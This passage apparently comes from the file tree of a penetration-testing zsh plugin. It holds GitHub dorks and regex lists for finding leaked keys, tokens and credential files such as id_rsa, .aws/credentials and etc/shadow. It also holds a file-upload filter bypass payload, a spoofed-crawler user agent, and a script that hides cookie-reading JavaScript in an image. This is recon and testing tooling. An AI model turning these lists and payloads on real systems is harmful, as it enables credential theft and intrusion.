"payloads/recon-dorks-github.txt", "content": "filename:constants\nfilename:settings\nfilename:database\nfilename:config\nfilename:environment\nfilename:spec\nfilename:zhrc\nfilename:bash\nfilename:npmrc\nfilename:dockercfg\nfilename:pass\nfilename:global\nfilename:credentials\nfilename:connections\nfilename:s3cfg\nfilename:wp-config\nfilename:htpasswd\nfilename:git-credentials\nfilename:id_dsa\nfilename:id_rsa\nextension:env\nextension:cfg\nextension:ini\nlanguage:yaml -filename:travis\nextension:properties\nextension:bat\nextension:sh\nextension:zsh\nextension:pem\nextension:ppk\nextension:sql\nfilename:bash_history\nfilename:bash_profile\nfilename:bashrc\nfilename:cshrc\nfilename:history\nfilename:netrc\nfilename:pgpass\nfilename:tugboat\nfilename:dhcpd.conf\nfilename:express.conf\nfilename:filezilla.xml\nfilename:idea14.key\nfilename:makefile\nfilename:gitconfig\nfilename:prod.exs\nfilename:prod.secret.exs\nfilename:proftpdpasswd\nfilename:recentservers.xml\nfilename:robomongo.json\nfilename:server.cfg\nfilename:shadow\nfilename:sshd_config\nfilename:known_hosts\nfilename:dockercfg\nfilename:github_token\nstaging\nstg\nprod\npreprod\nswagger\ninternal\ndotfiles\ndot-files\nmydotfiles\nconfig\ndbpasswd\ndb_password\ndb_username\ndbuser\ntestuser\ndbpassword\nkeyPassword\nstorePassword\npasswords\npassword\nsecret.password\ndatabase_password\nsql_password\npasswd\npass\npwd\npwds\nroot_password\ncredentials\nsecurity_credentials\nconnectionstring\nprivate -language:java\nprivate_key\nmaster_key\ntoken\naccess_token\nauth_token\noauth_token\nauthorizationToken\nsecret\nsecrets\nsecret_key\nsecret_token\napi_secret\napp_secret\nappsecret\nclient_secret\nkey\nsend_keys\nsend.keys\nsendkeys\napikey\napi_key\napp_key\napplication_key\nappkey\nappkeysecret\naccess_key\napiSecret\nx-api-key\napidocs\nsecret_access_key\nencryption_key\nconsumer_key\nauth\nsecure\nlogin\nconn.login\nsshpass\nssh2_auth_password\nirc_pass\nfb_secret\nsf_username\nnode_env\naws_key\naws_token\naws_secret\naws_access\nAWSSecretKey\ngithub_key\ngithub_token\ngh_token\nslack_api\nslack_token\nbucket_password\nredis_password\nldap_username\nldap_password\ngmail_username\ngmail_password\ncodecov_token\nfabricApiSecret\nmailgun\nmailchimp\nappspot\nfirebase\ngitlab\nstripe\nherokuapp\ncloudfront\namazonaws\nremoved\n\"removed password\"\nhardcoded\noops\n\"fixed security\"\n\"removed prod\"\n\"removed creds\"\n\"removed secret\"\nfilename:passwords.txt\nfilename:users.txt\n\n" }, { "path": "payloads/recon-dorks-google.txt", "content": "" }, { "path": "payloads/resolvers.txt", "content": "1.1.1.1\n1.0.0.1\n8.8.8.8\n8.8.4.4\n208.67.222.222\n208.67.220.220\n64.6.64.6\n64.6.65.6\n84.200.69.80\n84.200.70.40\n205.171.3.66\n205.171.202.166\n205.171.3.26\n205.171.2.26\n216.146.35.35\n216.146.36.36\n45.33.97.5\n37.235.1.177\n37.235.1.174\n172.104.237.57\n77.88.8.8\n77.88.8.1\n91.239.100.100\n89.233.43.71\n74.82.42.42\n156.154.70.5\n156.154.71.5\n45.77.165.194\n68.238.120.12 \n68.238.0.12\n207.148.83.241\n142.4.204.111\n142.4.205.47\n149.56.184.112\n51.79.68.177\n66.70.228.164\n172.98.193.42\n66.70.228.164\n128.31.0.72 \n155.138.240.237\n" }, { "path": "payloads/secrets-content.json", "content": "{\n \"flags\": \"-HnriE\",\n \"patterns\": [\n \"[a-z0-9.-]+\\\\.s3\\\\.amazonaws\\\\.com\",\n \"[a-z0-9.-]+\\\\.s3-[a-z0-9-]\\\\.amazonaws\\\\.com\",\n \"[a-z0-9.-]+\\\\.s3-website[.-](eu|ap|us|ca|sa|cn)\",\n \"//s3\\\\.amazonaws\\\\.com/[a-z0-9._-]+\",\n \"//s3-[a-z0-9-]+\\\\.amazonaws\\\\.com/[a-z0-9._-]+\",\n \"([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,}\",\n \"([^A-Za-z0-9+/]|^)(eyJ|YTo|Tzo|PD[89]|aHR0cHM6L|aHR0cDo|rO0)[%a-zA-Z0-9+/]+={0,2}\",\n \"([^A-Z0-9]|)AKIA[A-Z0-9]{12}([^A-Z0-9]|)\",\n \"[\\\\s][a-zA-Z0-9]{40}[\\\\s]\",\n \"aws_secret_access_key.*?[a-zA-Z0-9/\\\\\\\\+]{40}\",\n \"amzn\\\\\\\\.mws\\\\\\\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\",\n \"EAACEdEose0cBA[0-9A-Za-z]+\",\n \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\\\\\\\"][0-9a-f]{32}['|\\\\\\\"]\",\n \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].*['|\\\\\\\"][0-9a-zA-Z]{32,45}['|\\\\\\\"]\",\n \"[s|S][e|E][c|C][r|R][e|E][t|T].*['|\\\\\\\"][0-9a-zA-Z]{32,45}['|\\\\\\\"]\",\n \"[\\\\s*](token:\\\\s*)[\\\\S]{20}\",\n \"gitlab.token[^a-z0-9_]*?[a-z0-9_]{20}([^a-z0-9_]|$)\",\n \"private.token[^a-z0-9_]*?[a-z0-9_]{20}([^a-z0-9_]|$)\",\n \"access.token[^a-z0-9_]*?[a-z0-9_]{20}([^a-z0-9_]|$)\",\n \"[g|G][i|I][t|T][h|H][u|U][b|B].*['|\\\\\\\"][0-9a-zA-Z]{35,40}['|\\\\\\\"]\",\n \"\\\"type\\\": \\\"service_account\\\"\",\n \"[0-9]+-[0-9A-Za-z_]{32}\\\\.apps\\\\.googleusercontent\\\\.com\",\n \"ya29\\\\.[0-9A-Za-z\\\\-_]+\",\n \"AIza[0-9A-Za-z\\\\\\\\-_]{35}\",\n \"[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n \"[0-9a-f]{32}-us[0-9]{1,2}\",\n \"key-[0-9a-zA-Z]{32}\",\n \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n \"access_token\\\\$production\\\\$[0-9a-z]{16}\\\\$[0-9a-f]{32}\",\n \"sk_live_[0-9a-z]{32}\",\n \"(-*)BEGIN [\\\\\\\\s\\\\\\\\S]{2,} PRIVATE KEY(-*)\",\n \"SG\\\\.[a-zA-Z0-9]{22}\\\\.[a-zA-Z0-9]{43}\",\n \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n \"sq0atp-[0-9A-Za-z\\\\\\\\-_]{22}\",\n \"sq0csp-[0-9A-Za-z\\\\\\\\-_]{43}\",\n \"sk_live_[0-9a-zA-Z]{24}\",\n \"rk_live_[0-9a-zA-Z]{24}\",\n \"SK[0-9a-fA-F]{32}\",\n \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[1-9][0-9]+-[0-9a-zA-Z]{40}\",\n \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*['|\\\"][0-9a-zA-Z]{35,44}['|\\\"]\",\n \"deleted\",\n \"security\",\n \"removed\",\n \"test-data\",\n \"prod\",\n \"production\"\n\n ]\n}\n" }, { "path": "payloads/secrets-files.json", "content": "{\n \"flags\": \"-HnriE\",\n \"patterns\": [\n \"database\",\n \"settings\",\n \"database\",\n \"config\",\n \"environment\",\n \"spec\",\n \"zshrc\",\n \"bash\",\n \"npmrc\",\n \"dockercfg\",\n \"pass\",\n \"global\",\n \"credentials\",\n \"connections\",\n \"s3cfg\",\n \"wp-config\",\n \"htpasswd\",\n \"git-credentials\",\n \"id_dsa\",\n \"id_rsa\",\n \"creds\",\n \".*\\\\.env$\",\n \"\\\\.agilekeychain$\",\n \"\\\\.?aws/credentials$\",\n \"^\\\\.?htpasswd$\",\n \"\\\\.keychain$\",\n \"\\\\.cscfg$\",\n \"carrierwave.rb\",\n \"knife.rb\",\n \"\\\\.?chef/(.*)\\\\.pem$\",\n \"^(\\\\.|_)?netrc$\",\n \"credential\",\n \"password\",\n \"^\\\\.?dbeaver-data-sources.xml$\",\n \"\\\\.dayone$\",\n \"doctl/config.yaml$\",\n \"settings.py\",\n \"^\\\\.?dockercfg$\",\n \"^\\\\.?env$\",\n \"filezilla.xml\",\n \"recentservers.xml\",\n \"^key(store|ring)$\",\n \"^\\\\.?gitconfig$\",\n \"config/hub$\",\n \"\\\\.gnucash$\",\n \"credentials.db\",\n \"credentials.json\",\n \"^.*-[a-f0-9]{12}\\\\.json$\",\n \"\\\\.?xchat2?/servlist_?\\\\.conf$\",\n \"\\\\.?irssi/config$\",\n \"\\\\.jks$\",\n \"jenkins.plugins.publish_over_ssh.BapSshPublisherPlugin.xml\",\n \"\\\\.kwallet$\",\n \"^kdbx?$\",\n \".boto\",\n \"adc.json\",\n \"configuration.user.xpl\",\n \"\\\\.tpm$\",\n \"\\\\.bek$\",\n \"\\\\.mdf$\",\n \"\\\\.sdf$\",\n \"^\\\\.?muttrc$\",\n \"^\\\\.?mysql_history$\",\n \"^\\\\.?npmrc$\",\n \"\\\\.pcap$\",\n \"omniauth.rb\",\n \"\\\\.ovpn$\",\n \"config(\\\\.inc)?\\\\.php$\",\n \"\\\\.psafe3$\",\n \"otr.private_key\",\n \"\\\\.?purple/accounts\\\\.xml$\",\n \"^\\\\.?psql_history$\",\n \"^\\\\.?pgpass$\",\n \"credentials.xml\",\n \"etc/passwd$\",\n \"etc/shadow$\",\n \"LocalSettings.php\",\n \"database.yml\",\n \"\\\\.pkcs12$\",\n \"\\\\.p12$\",\n \"\\\\.pfx$\",\n \"\\\\.asc$\",\n \"^key(pair)?$\",\n \"\\\\.pem$\",\n \"journal.txt\",\n \"^.*_rsa$\",\n \"^.*_dsa$\",\n \"^.*_ed25519$\",\n \"^.*_ecdsa$\",\n \"\\\\.?recon-ng/keys\\\\.db$\",\n \"\\\\.rdp$\",\n \"robomongo.json\",\n \"^\\\\.?irb_history$\",\n \"secret_token.rb\",\n \"\\\\.?gem/credentials$\",\n \"^\\\\.?s3cfg$\",\n \"^sftp-config(\\\\.json)?$\",\n \"^sql(dump)?$\",\n \"\\\\.sqlite$\",\n \"\\\\.?ssh/config$\",\n \"Favorites.plist\",\n \"`^\\\\.?(bash_|zsh_)?aliases$\",\n \"^\\\\.?(bash_|zsh_|sh_|z)?history$\",\n \"^\\\\.?(bash|zsh|csh)rc$\",\n \".exports\",\n \".functions\",\n \".extra\",\n \"^\\\\.?(bash_|zsh_)?profile$\",\n \"^\\\\.?trc$\",\n \"terraform.tfvars\",\n \"^\\\\.?tugboat$\",\n \"\\\\.tblk$\",\n \"ventrilo_srv.ini\",\n \"^\\\\.?gitrobrc$\",\n \"\\\\.fve$\",\n \"proftpdpasswd\",\n \"^\\\\.?git-credentials$\",\n \"robomongo.json\",\n \"idea14.key\",\n \"express.conf\",\n \"prod.exs\",\n \"prod.secret.exs\",\n \"logins.json\",\n \".remote-sync.json\",\n \".ftpconfig\"\n ]\n}\n" }, { "path": "payloads/tcp-ports.txt", "content": "21,22,25,80,88,161,443,445,744,1433,1521,2075,2076,3000,3306,3366,3389,3868,4000,4040,4044,4443,5000,5432,5900,6000,6443,7077,8000,8080,8081,8089,8181,8443,8888,9000,9091,9443,9999,27017,10000,15672" }, { "path": "payloads/user-agents.txt", "content": "Googlebot/2.1 (+http://www.google.com/bot.html)\nMozilla/5.0\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\nMozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148\n" }, { "path": "payloads/web-file-upload-bypass-bytes.txt", "content": "JPEG - FF D8 FF DB - ÿØÿÛ \nGIF - 47 49 46 38 - GIF8\nPNG - 89 50 4E 47 - ‰PNG\n" }, { "path": "payloads/web-file-upload-bypass.txt", "content": "Content-Disposition: form-data; name=\"upload\"; filename=\"badfile.''gif\"\nContent-Type: image/png\n\nGIF8\n" }, { "path": "payloads/wordlist-api.txt", "content": "0\n1\n2\n3\naccelerate\naccept\naccount\naccounts\nacquire\nactivate\nactive\nadapt\nadd\naddress-check\nadjust\nadmin\nalert\namount\nannotate\nanticipate\napi\napi_auth\napis\napply\narchive\narrange\nasset\nassets\nauth\nauth_user\nbalance\nbalances\nbar\nbaz\nbio\nbios\nbuild\ncalculate\ncfg\nchange\nchannel\nchart\ncheck\nchild\nchildren\nclaim\nclass\nclient\nclients\nclose\ncollect\ncomm\ncomment\ncomments\ncommon\ncommunicate\ncompany\ncompare\ncomplete\ncompose\ncompute\nconf\nconfig\nconnections\nconsolidate\nconstruct\ncontact\ncontract\ncoordinate\ncount\ncreate\ncredentials\ncreds\ncrush\ncsv\ncurrent\ncustom\ncustomer\ncustomers\ndamage\ndashboard\ndata\ndebug\ndef\ndefault\ndefine\ndel\ndelete\ndeliver\ndelta\ndemo\ndemonstrate\ndequeue\nderive\ndesign\ndestroy\ndetails\ndetect\ndev\ndevelop\ndevelopers\ndeviceCatalog\ndevices\ndeviceTypes\ndevise\ndir\ndirectory\ndisable\ndisplay\ndivide\ndo\ndob\ndocs\ndocumentation\ndoFor\ndomain\ndownload\nedit\nemail\nemployee\nenable\nerr\nerrors\nevent\nevents\nexplode\nexport\nfabricate\nfashion\nfeed\nfile\nfiles\nfilter\nfoo\nforge\nform\nformat\ngenerate\nget\ngithub\ngmail\ngo\ngroup\nhealth\nhelp\nhidden\nhistory\nhome\nid\nimage\nimport\nimprove\ninclude\ninfo\ninform\ninput\ninquiry\ninsert\ninstall\ninstances\ninterpret\nitem\njob\njoin\njson\nkey\nkill\nlang\nlast\nlevel\nlink\nlinks\nlist\nload\nlocation\nlock\nlog\nlog_event\nlogin\nlogins\nlogout\nlogs\nloop\nmain\nmake\nmanufacturers\nmap\nmax\nmember\nmembers\nmerchant\nmerge\nmetadata\nmethod\nmethods\nmetrics\nmin\nmod\nmoney\nmonitoring\nmove\nmultiply\nmy\nname\nnames\nnew\nnext\nnotifications\nnotify\noauth\nobject\nobjects\nopen\noption\noptions\norder\norders\noriginate\nout\npack\npage\npages\npanel\nparent\nparse\npass\npassword\npasswords\npermissions\nphone\npicture\npin\nplugin\npost\nposts\npreferences\npreserve\npreview\nprint\nprivate\nprod\nproduce\nproduction\nprofile\nprofiles\npromote\npublic\nput\nq\nquery\nqueue\nqueue-jobs\nquit\nraw\nreactivate\nread\nrecite\nrecord\nref\nreg\nregister\nrelease\nremove\nresend-verification\nrestore\nrestrict\nretrieve\nrobots.txt\nrss\nrun\ns\nsale\nsales\nsave\nsearch\nselect\nsend\nserver\nset\nsetting\nsettings\nsetup\nshow\nsite\nsleep\nsort\nsplit\nstart\nstate\nstatus\nstop\nstudy\nsub\nsummaries\nswagger\nswagger.json\nswagger-resources\nswagger-ui.html\ntable\ntags\ntemp\ntemplate\nterminate\ntest\ntests\ntheme\nticket\ntmp\ntoken\ntwitter\ntype\nunderstand\nundo\nunion\nunit\nunqueue\nupdate\nupgrade\nupload\nupset\nurl\nuse\nuser\nuserAccountAssignments\nuserAssets\nuserdetails\nusername\nuserPreferences\nusers\nv0\nv1\nv2\nv3\nvalidate\nvendor\nvendors\nverify\nversion\nwait\nwebsite\nwork\nxml\nxmlrpc\nyahoo\nzip\n" }, { "path": "payloads/wordlists.txt", "content": "/usr/share/seclists/Discovery/Web-Content/quickhits.txt\n/usr/share/seclists/Discovery/Web-Content/common.txt\n/usr/share/seclists/Discovery/Web-Content/raft-large-words.txt\n/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt\n/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n/usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt\n/usr/share/seclists/Discovery/Web-Content/swagger.txt\n/usr/share/seclists/Discovery/Web-Content/graphql.txt\n" }, { "path": "quiver.code-workspace", "content": "{\n \"folders\": [\n {\n \"path\": \".\"\n }\n ]\n}" }, { "path": "quiver.plugin.zsh", "content": "#!/usr/bin/env zsh\n\nautoload colors; colors\n\n############################################################# \n# quiver\n# Author: Steve Mcilwain\n# Contributors: \n#############################################################\n\n# check for essential packages\n\ndpkg -l | grep -qw rlwrap || sudo apt-get -y install rlwrap\ndpkg -l | grep -qw git || sudo apt-get -y install git\n\n# check for directories\n\nmkdir -p $HOME/.quiver/{vars,globals}\n\n############################################################# \n# Constants\n#############################################################\n\nexport __PLUGIN=\"${0:A:h}\"\nexport __VER=$(cat ${__PLUGIN}/VERSION)\nexport __LOGFILE=\"${__PLUGIN}/log.txt\"\nexport __REMOTE_CHK=\"${__PLUGIN}/remote_checked.txt\"\nexport __REMOTE_VER=\"${__PLUGIN}/remote_ver.txt\"\nexport __STATUS=$(cd ${__PLUGIN} && git status | grep On | cut -d\" \" -f2,3)\nexport __VARS=$HOME/.quiver/vars\nexport __GLOBALS=$HOME/.quiver/globals\nexport __PAYLOADS=\"$__PLUGIN/payloads\"\nexport __SCRIPTS=\"$__PLUGIN/scripts\"\nexport __TOOLS=\"$HOME/tools\"\n\n############################################################# \n# Self Update\n#############################################################\n\n__version-check() {\n\n local seconds=$((60*60*24*1))\n\n if test -f \"$__REMOTE_CHK\" ; then\n if test \"$(($(date \"+%s\")-$(date -f \"$__REMOTE_CHK\" \"+%s\")))\" -lt \"$seconds\" ; then\n echo \"[*] Version already checked today: $__REMOTE_CHK\" >> ${__LOGFILE}\n exit 1\n fi\n fi\n\n date -R > $__REMOTE_CHK\n\n echo \"$(curl -s https://raw.githubusercontent.com/stevemcilwain/quiver/master/VERSION)\" > $__REMOTE_VER\n \n echo \"[*] Version checked and stored in: $__REMOTE_VER\" >> ${__LOGFILE}\n\n}\n\n(__version-check &)\n\n############################################################# \n# Diagnostic Log\n#############################################################\n\necho \"Quiver ${__VER} in ${__PLUGIN}\" > ${__LOGFILE}\necho \" \" >> ${__LOGFILE}\necho \"[*] loading... \" >> ${__LOGFILE}\n\n#Source all qq scripts\n\nfor f in ${0:A:h}/modules/qq* ; do\n echo \"[+] sourcing $f ... \" >> ${__LOGFILE}\n source $f >> ${__LOGFILE} 2>&1\ndone\n\nsource ${__ALIASES}\n\n# completion enhancement\n# zstyle ':completion:*' matcher-list 'r:|[-]=**'\nZSTYLE_ORIG=`zstyle -L ':completion:\\*' matcher-list`\nZSTYLE_NEW=\"${ZSTYLE_ORIG} 'r:|[-]=**'\"\neval ${ZSTYLE_NEW}\n\necho \"[*] quiver loaded.\" >> ${__LOGFILE}\n\n############################################################# \n# Shell Log\n#############################################################\n\necho \" \"\n\nif [[ -f \"$__REMOTE_VER\" ]]; then\n \n echo \"[*] Remote version file exists: $__REMOTE_VER \" >> ${__LOGFILE}\n\n rv=$(cat ${__REMOTE_VER})\n\n if [[ ! -z $rv ]]; then\n\n echo \"[*] Remote version is |${rv}|\" >> ${__LOGFILE}\n\n [[ \"$rv\" == \"$__VER\" ]] && __info \"Quiver is up to date\" || __warn \"Quiver update available: $rv, use qq-update to install\"\n\n fi\n\nfi\n\n__info \"Quiver ${__VER} ZSH plugin loaded \"\n\n" }, { "path": "scripts/dns-reverse-brute.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# dns-reverse-brute\n#############################################################\n\n#[[ -z $1 ]] && echo -e \"[!] Missing argument.\\nUsage: zsh $0 \" && exit\n\ncat $1 | while read domain; do if host -t A \"$domain\" | awk '{print $NF}' | grep -E '^(192\\.168\\.|172\\.1[6789]\\.|172\\.2[0-9]\\.|172\\.3[01]\\.|10\\.)' &>/dev/null; then echo $domain; fi; done\n" }, { "path": "scripts/image-gen.js", "content": "(function() {\n function encode(a) {\n if (a.length) {\n var c = a.length,\n e = Math.ceil(Math.sqrt(c / 3)),\n f = e,\n g = document.createElement(\"canvas\"),\n h = g.getContext(\"2d\");\n g.width = e, g.height = f;\n var j = h.getImageData(0, 0, e, f),\n k = j.data,\n l = 0;\n for (var m = 0; m < f; m++)\n for (var n = 0; n < e; n++) {\n var o = 4 * (m * e) + 4 * n,\n p = a[l++],\n q = a[l++],\n r = a[l++];\n (p || q || r) && (p && (k[o] = ord(p)), q && (k[o + 1] = ord(q)), r && (k[o + 2] = ord(r)), k[o + 3] = 255)\n }\n return h.putImageData(j, 0, 0), h.canvas.toDataURL()\n }\n }\n var ord = function ord(a) {\n var c = a + \"\",\n e = c.charCodeAt(0);\n if (55296 <= e && 56319 >= e) {\n if (1 === c.length) return e;\n var f = c.charCodeAt(1);\n return 1024 * (e - 55296) + (f - 56320) + 65536\n }\n return 56320 <= e && 57343 >= e ? e : e\n },\n d = document,\n b = d.body,\n img = new Image;\n var stringenc = \"Hello, World!\";\n img.src = encode(stringenc), b.innerHTML = \"\", b.appendChild(img)\n})();\n\n\n(function() {\n function encode(a) {\n if (a.length) {\n var c = a.length,\n e = Math.ceil(Math.sqrt(c / 3)),\n f = e,\n g = document.createElement(\"canvas\"),\n h = g.getContext(\"2d\");\n g.width = e, g.height = f;\n var j = h.getImageData(0, 0, e, f),\n k = j.data,\n l = 0;\n for (var m = 0; m < f; m++)\n for (var n = 0; n < e; n++) {\n var o = 4 * (m * e) + 4 * n,\n p = a[l++],\n q = a[l++],\n r = a[l++];\n (p || q || r) && (p && (k[o] = ord(p)), q && (k[o + 1] = ord(q)), r && (k[o + 2] = ord(r)), k[o + 3] = 255)\n }\n return h.putImageData(j, 0, 0), h.canvas.toDataURL()\n }\n }\n var ord = function ord(a) {\n var c = a + \"\",\n e = c.charCodeAt(0);\n if (55296 <= e && 56319 >= e) {\n if (1 === c.length) return e;\n var f = c.charCodeAt(1);\n return 1024 * (e - 55296) + (f - 56320) + 65536\n }\n return 56320 <= e && 57343 >= e ? e : e\n },\n d = document,\n b = d.body,\n img = new Image;\n var stringenc = \"function asd() {\\\n var d = document;\\\n var c = 'cookie';\\\n alert(d[c]);\\\n };asd();/*Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam aliquam blandit metus vel elementum. Mauris mi tortor, congue eget fringilla id, tempus a tellus. Morbi laoreet vitae ipsum vel dapibus. Nunc eu faucibus ligula. Donec maximus malesuada justo. Nulla congue, risus quis dapibus porttitor, metus quam rutrum dolor, ac maximus nibh metus quis enim. Aenean hendrerit venenatis massa ac gravida. Donec at nisi quis ex sollicitudin bibendum sit amet ac quam.\\\n Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\\\n Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\\\n Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\\\n Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\\\n Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\\\n Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\\\n Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\\\n Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\\\n Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\\\n Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\\\n Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\\\n Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\\\n Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis 